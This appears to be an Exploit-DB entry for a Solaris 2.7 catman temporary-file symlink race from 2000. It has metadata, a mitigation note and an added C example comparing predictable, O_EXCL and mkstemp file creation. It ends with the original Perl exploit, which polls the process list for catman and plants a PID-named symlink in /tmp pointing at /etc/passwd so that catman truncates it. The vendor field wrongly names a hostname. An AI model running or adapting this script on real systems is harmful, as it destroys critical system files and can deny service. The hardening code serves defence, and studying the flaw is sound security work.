Vendor: rootabega
By: Vapid Labs
CVSS: 7.2 (HIGH)
Symlink Vulnerability
CWE: 59
Product Name: rootabega
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Solaris 2.7
2000

Catman Symlink Vulnerability

This exploit relies on catman creating files in /tmp insecurely. The file names are based on the PID of the catman process, and catman will happily clobber any file that such a name is symlinked to. The script watches the process list for the catman process, gets its PID and creates a symlink in /tmp pointing to the file to be clobbered. The exploit depends on system speed and process load.

Mitigation:

Ensure that the catman process is running with the least privileges and that the /tmp directory is not writable by the catman process.
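
The flaw behind this advisory is how the temporary file is opened, so a fix in the program itself is to create it exclusively. The following C is an added example, not code from the advisory or from catman: open_predictable models the described behaviour as an assumption, the other two openers are hardened forms, and the scratch directory, the PID 4242 and the stand-in file are constructed.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

static int open_named(const char *dir, long pid, int flags) {
    char p[512];
    snprintf(p, sizeof p, "%s/sman_%ld", dir, pid);
    return open(p, O_WRONLY | O_CREAT | flags, 0600);
}
/* Model of the described behaviour (assumption, not catman's source): no
 * O_EXCL, so a symlink at the PID-derived name is followed and truncated. */
int open_predictable(const char *dir, long pid) { return open_named(dir, pid, O_TRUNC); }
/* Same name, but O_EXCL makes open() fail if anything, even a symlink, is there. */
int open_exclusive(const char *dir, long pid) { return open_named(dir, pid, O_EXCL | O_NOFOLLOW); }
/* Preferred: mkstemp() picks an unpredictable name, created exclusively, mode 0600. */
int open_mkstemp(const char *dir, char *out, size_t n) {
    snprintf(out, n, "%s/sman_XXXXXX", dir);
    return mkstemp(out);
}

/* Constructed scenario in a private scratch directory: a symlink already
 * sits at the predictable name and points at a 10-byte stand-in file.
 * mode 0/1/2 selects the opener; returns the stand-in's size afterwards. */
long standin_size_after(int mode) {
    char dir[] = "/tmp/symdemo_XXXXXX", tgt[512], lnk[512], tmp[512] = "";
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(tgt, sizeof tgt, "%s/standin", dir);
    snprintf(lnk, sizeof lnk, "%s/sman_%ld", dir, 4242L);
    int fd = open(tgt, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "important\n", 10) != 10) return -1;
    close(fd);
    if (symlink(tgt, lnk) != 0) return -1;
    fd = mode == 0 ? open_predictable(dir, 4242L)
       : mode == 1 ? open_exclusive(dir, 4242L)
                   : open_mkstemp(dir, tmp, sizeof tmp);
    if (fd >= 0) close(fd);
    long size = stat(tgt, &st) == 0 ? (long)st.st_size : -1;
    unlink(tmp); unlink(lnk); unlink(tgt); rmdir(dir);
    return size;
}
int main(void) {
    printf("predictable: %ld  O_EXCL: %ld  mkstemp: %ld\n",
           standin_size_after(0), standin_size_after(1), standin_size_after(2));
    return 0;
}
```

A size of 0 means the stand-in file was truncated through the symlink; 10 means it was left intact.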
Exploit-DB raw data:

#!/usr/local/bin/perl -w 
#
# The problem is catman creates files in /tmp
# insecurely. They are based on the PID of the
# catman process, catman will happily clobber
# any files that  are symlinked to that file.
# The idea of this  script  is  to  watch the
# process  list  for  the catman process, get
# the pid and Create a symlink in /tmp to our
# file to be clobbered.  This exploit depends
# on  system  speed  and  process  load. This
# worked on a patched Solaris 2.7 box (August
# 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 lwc@vapid.betteros.org
# 11/21/2000   Vapid Labs.
# http://vapid.betteros.org

$clobber = "/etc/passwd";
while(1) {
  open ps,"ps -ef | grep -v grep |grep -v PID |";
  while(<ps>) {
    @args = split " ", $_;
    if (/catman/) { 
      print "Symlinking sman_$args[1] to  $clobber\n";
      symlink($clobber,"/tmp/sman_$args[1]");
      exit(1);
    }
  }
}


# milw0rm.com [2000-12-20]